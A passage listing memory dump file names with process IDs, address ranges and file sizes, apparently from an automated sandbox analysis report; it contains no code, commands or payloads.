memory/4008-144-0x0000000000000000-mapping.dmp
-
memory/4044-252-0x0000000002F50000-0x0000000002F8A000-memory.dmpFilesize
232KB
-
memory/4044-253-0x00000000030C0000-0x0000000003116000-memory.dmpFilesize
344KB
-
memory/4104-206-0x0000000000000000-mapping.dmp
-
memory/4148-222-0x0000000000000000-mapping.dmp
-
memory/4168-202-0x0000000000000000-mapping.dmp
-
memory/4204-203-0x0000000000000000-mapping.dmp
-
memory/4236-173-0x0000000000000000-mapping.dmp
-
memory/4244-218-0x0000000000000000-mapping.dmp
-
memory/4352-204-0x0000000000000000-mapping.dmp
-
memory/4388-219-0x0000000000000000-mapping.dmp
-
memory/4396-207-0x0000000000000000-mapping.dmp
-
memory/4432-299-0x00000000006A0000-0x00000000006A1000-memory.dmpFilesize
4KB
-
memory/4552-208-0x0000000000000000-mapping.dmp
-
memory/4616-285-0x0000000000E70000-0x0000000000E72000-memory.dmpFilesize
8KB
-
memory/4716-251-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4716-184-0x0000000000000000-mapping.dmp
-
memory/4724-223-0x0000000000000000-mapping.dmp
-
memory/4744-189-0x0000000000000000-mapping.dmp
-
memory/4764-211-0x0000000000000000-mapping.dmp
-
memory/4796-193-0x0000000000000000-mapping.dmp
-
memory/4836-220-0x0000000000000000-mapping.dmp
-
memory/4836-248-0x0000000000400000-0x0000000000983000-memory.dmpFilesize
5.5MB
-
memory/4840-212-0x0000000000000000-mapping.dmp
-
memory/4852-226-0x0000000000000000-mapping.dmp
-
memory/4856-194-0x0000000000000000-mapping.dmp
-
memory/4868-195-0x0000000000000000-mapping.dmp
-
memory/4884-213-0x0000000000000000-mapping.dmp
-
memory/4928-196-0x0000000000000000-mapping.dmp
-
memory/4940-197-0x0000000000000000-mapping.dmp
-
memory/4960-250-0x0000000000400000-0x0000000000443000-memory.dmpFilesize
268KB
-
memory/4968-214-0x0000000000000000-mapping.dmp
-
memory/4992-224-0x0000000000000000-mapping.dmp
-
memory/4996-286-0x0000000002EC0000-0x0000000002FAF000-memory.dmpFilesize
956KB
-
memory/4996-287-0x0000000000CA0000-0x0000000000CBB000-memory.dmpFilesize
108KB
-
memory/4996-247-0x0000000002600000-0x000000000279C000-memory.dmpFilesize
1.6MB
-
memory/4996-288-0x0000000000CB0000-0x0000000000CB1000-memory.dmpFilesize
4KB
-
memory/5004-198-0x0000000000000000-mapping.dmp
-
memory/5012-249-0x0000000002620000-0x0000000002622000-memory.dmpFilesize
8KB
-
memory/5044-199-0x0000000000000000-mapping.dmp
-
memory/5056-200-0x0000000000000000-mapping.dmp
-
memory/5060-216-0x0000000000000000-mapping.dmp
-
memory/5076-201-0x0000000000000000-mapping.dmp
-
memory/5076-217-0x0000000000000000-mapping.dmp
-
memory/5100-215-0x0000000000000000-mapping.dmp
-
memory/5148-228-0x0000000000000000-mapping.dmp
-
memory/5184-229-0x0000000000000000-mapping.dmp
-
memory/5188-277-0x00000000059E0000-0x0000000005A71000-memory.dmpFilesize
580KB
-
memory/5188-280-0x0000000000400000-0x0000000003DED000-memory.dmpFilesize
57.9MB
-
memory/5196-230-0x0000000000000000-mapping.dmp
-
memory/5268-231-0x0000000000000000-mapping.dmp
-
memory/5304-232-0x0000000000000000-mapping.dmp
-
memory/5316-233-0x0000000000000000-mapping.dmp
-
memory/5444-234-0x0000000000000000-mapping.dmp
-
memory/5452-270-0x00000242EF5D0000-0x00000242EF637000-memory.dmpFilesize
412KB
-
memory/5452-289-0x00000242F1340000-0x00000242F1446000-memory.dmpFilesize
1.0MB
-
memory/5456-235-0x0000000000000000-mapping.dmp
-
memory/5560-291-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/5560-236-0x0000000000000000-mapping.dmp
-
memory/5604-304-0x0000000005080000-0x0000000005081000-memory.dmpFilesize
4KB
-
memory/5604-307-0x00000000050B0000-0x00000000050B1000-memory.dmpFilesize
4KB
-
memory/5604-297-0x0000000005030000-0x0000000005031000-memory.dmpFilesize
4KB
-
memory/5604-308-0x00000000050C0000-0x00000000050C1000-memory.dmpFilesize
4KB
-
memory/5604-298-0x0000000005040000-0x0000000005041000-memory.dmpFilesize
4KB
-
memory/5604-306-0x00000000050A0000-0x00000000050A1000-memory.dmpFilesize
4KB
-
memory/5604-293-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/5604-305-0x0000000005090000-0x0000000005091000-memory.dmpFilesize
4KB
-
memory/5604-295-0x0000000005010000-0x0000000005011000-memory.dmpFilesize
4KB
-
memory/5604-296-0x0000000005020000-0x0000000005021000-memory.dmpFilesize
4KB
-
memory/5604-309-0x00000000050D0000-0x00000000050D1000-memory.dmpFilesize
4KB
-
memory/5604-303-0x0000000005070000-0x0000000005071000-memory.dmpFilesize
4KB
-
memory/5604-301-0x0000000005050000-0x0000000005051000-memory.dmpFilesize
4KB
-
memory/5604-237-0x0000000000000000-mapping.dmp
-
memory/5604-294-0x0000000005000000-0x0000000005001000-memory.dmpFilesize
4KB
-
memory/5604-302-0x0000000005060000-0x0000000005061000-memory.dmpFilesize
4KB
-
memory/5640-292-0x00000000001F0000-0x00000000001F1000-memory.dmpFilesize
4KB
-
memory/5644-238-0x0000000000000000-mapping.dmp
-
memory/5652-290-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/5780-239-0x0000000000000000-mapping.dmp
-
memory/5820-240-0x0000000000000000-mapping.dmp
-
memory/5968-241-0x0000000000000000-mapping.dmp
-
memory/6020-242-0x0000000000000000-mapping.dmp
-
memory/6072-244-0x0000000000000000-mapping.dmp